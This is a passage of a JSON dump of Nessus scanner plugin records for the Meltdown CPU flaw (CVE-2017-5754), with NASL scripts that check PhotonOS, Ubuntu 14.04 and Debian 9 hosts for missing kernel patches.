value:\"http://www.nessus.org/u?1e32d79a\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.110-1.ph1\",\n \"linux-debuginfo-4.4.110-1.ph1\",\n \"linux-dev-4.4.110-1.ph1\",\n \"linux-docs-4.4.110-1.ph1\",\n \"linux-drivers-gpu-4.4.110-1.ph1\",\n \"linux-esx-4.4.110-1.ph1\",\n \"linux-esx-debuginfo-4.4.110-1.ph1\",\n \"linux-esx-devel-4.4.110-1.ph1\",\n \"linux-esx-docs-4.4.110-1.ph1\",\n \"linux-oprofile-4.4.110-1.ph1\",\n \"linux-sound-4.4.110-1.ph1\",\n \"linux-tools-4.4.110-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:43:12", "description": "USN-3522-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nJann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory. (CVE-2017-5754).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerability (USN-3522-2) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3522-2.NASL", "href": "https://www.tenable.com/plugins/nessus/105725", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105725);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-2\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerability (USN-3522-2) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3522-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nJann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory. (CVE-2017-5754).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-1009-aws\", pkgver:\"4.4.0-1009.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-108-generic\", pkgver:\"4.4.0-108.131~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-108-lowlatency\", pkgver:\"4.4.0-108.131~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1009.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.108.91\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.108.91\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-31T14:13:22", "description": "Multiple researchers have discovered a vulnerability in Intel processors, enabling an attacker controlling an unprivileged process to read memory from arbitrary addresses, including from the kernel and all other processes running on the system.\n\nThis specific attack has been named Meltdown and is addressed in the Linux kernel for the Intel x86-64 architecture by a patch set named Kernel Page Table Isolation, enforcing a near complete separation of the kernel and userspace address maps and preventing the attack. This solution might have a performance impact, and can be disabled at boot time by passing pti=off to the kernel command line.\n\nWe also identified a regression for ancient userspaces using the vsyscall interface, for example chroot and containers using (e)glibc 2.13 and older, including those based on Debian 7 or RHEL/CentOS 6.\nThis regression will be fixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time are not addressed in this update and will be fixed in a later update.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-05T00:00:00", "type": "nessus", "title": "Debian DSA-4078-1 : linux - security update (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-07-15T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4078.NASL", "href": "https://www.tenable.com/plugins/nessus/105595", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4078. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105595);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"DSA\", value:\"4078\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Debian DSA-4078-1 : linux - security update (Meltdown)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple researchers have discovered a vulnerability in Intel\nprocessors, enabling an attacker controlling an unprivileged process\nto read memory from arbitrary addresses, including from the kernel and\nall other processes running on the system.\n\nThis specific attack has been named Meltdown and is addressed in the\nLinux kernel for the Intel x86-64 architecture by a patch set named\nKernel Page Table Isolation, enforcing a near complete separation of\nthe kernel and userspace address maps and preventing the attack. This\nsolution might have a performance impact, and can be disabled at boot\ntime by passing pti=off to the kernel command line.\n\nWe also identified a regression for ancient userspaces using the\nvsyscall interface, for example chroot and containers using (e)glibc\n2.13 and older, including those based on Debian 7 or RHEL/CentOS 6.\nThis regression will be fixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time\nare not addressed in this update and will be fixed in a later update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4078\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the oldstable distribution (jessie), this problem will be fixed in\na separate update.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.9.65-3+deb9u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"hyperv-daemons\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libcpupower-dev\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libcpupower1\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libusbip-dev\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-arm\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-s390\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-x86\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-cpupower\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-doc-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-4kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-5kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-686\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-arm64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-armel\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-armhf\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-i386\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mips\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mips64el\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mipsel\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-ppc64el\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-s390x\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-arm64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-armmp\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-armmp-lpae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-common\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-common-rt\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-loongson-3\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-marvell\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-octeon\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-powerpc64le\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-rt-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-rt-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-s390x\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-4kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-4kc-malta-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-5kc-malta\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-5kc-malta-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-pae-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-amd64-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-arm64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-arm64-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-lpae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-lpae-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-loongson-3\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-loongson-3-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-marvell\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-marvell-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-octeon\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-octeon-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-powerpc64le\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-powerpc64le-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-686-pae\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-686-pae-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-amd64\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-amd64-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-s390x\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-s390x-dbg\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-kbuild-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-libc-dev\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-manual-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-perf-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-source-4.9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-support-4.9.0-9\", reference:\"4.9.65-3+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"usbip\", reference:\"4.9.65-3+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-31T14:10:27", "description": "Jann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow 